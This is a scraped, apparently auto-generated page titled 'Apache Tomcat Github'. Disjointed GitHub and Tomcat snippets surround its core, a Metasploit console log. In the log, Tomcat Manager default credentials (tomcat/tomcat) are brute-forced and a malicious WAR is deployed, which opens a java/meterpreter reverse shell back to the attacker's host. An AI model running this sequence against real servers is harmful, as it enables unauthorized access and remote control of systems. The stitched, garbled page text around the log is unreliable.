12/13/2021»»Monday

Apache Tomcat Github

12/13/2021
    42 - Comments
Apache Tomcat Manager Common Administrative Credentials
Apache Tomcat Manager Common Administrative Credentials
Apache Tomcat Github
  • Apache Tomcat Upstart script. GitHub Gist: instantly share code, notes, and snippets.
  • Apache Tomcat is an open source tool with 5.3K GitHub stars and 3.6K GitHub forks. Here’s a link to Apache Tomcat's open source repository on GitHub.

GitHub Gist: instantly share code, notes, and snippets.

Tomcat Source

Tomcat

Apache Tomcat Download

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > setg RHOSTS 10.1.1.130
RHOSTS => 10.1.1.130
msf auxiliary(tomcat_mgr_login) > exploit
...........
............
.............
msf auxiliary(tomcat_mgr_login) > creds
Credentials
host port user pass type active?
---- ---- ---- ---- ---- -------
10.1.1.130 8180 tomcat tomcat password true
[*] Found 1 credential.
msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target 'Linux x86'
[*] Uploading 6459 bytes as bWFwnoBbIedec7kyEOzZ.war ...
[*] Executing /bWFwnoBbIedec7kyEOzZ/5f0tDtPEV9UXyAkQ6uP.jsp...
[*] Undeploying bWFwnoBbIedec7kyEOzZ ...
[*] Sending stage (30216 bytes) to 10.1.1.130
[*] Meterpreter session 2 opened (10.1.1.1:4444 -> 10.1.1.130:48633) at 2012-08-28 14:11:29 +0800
meterpreter > getuid
Server username: tomcat55
....不是root,飘过

Apache Tomcat Github Download

Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment

Recent Pages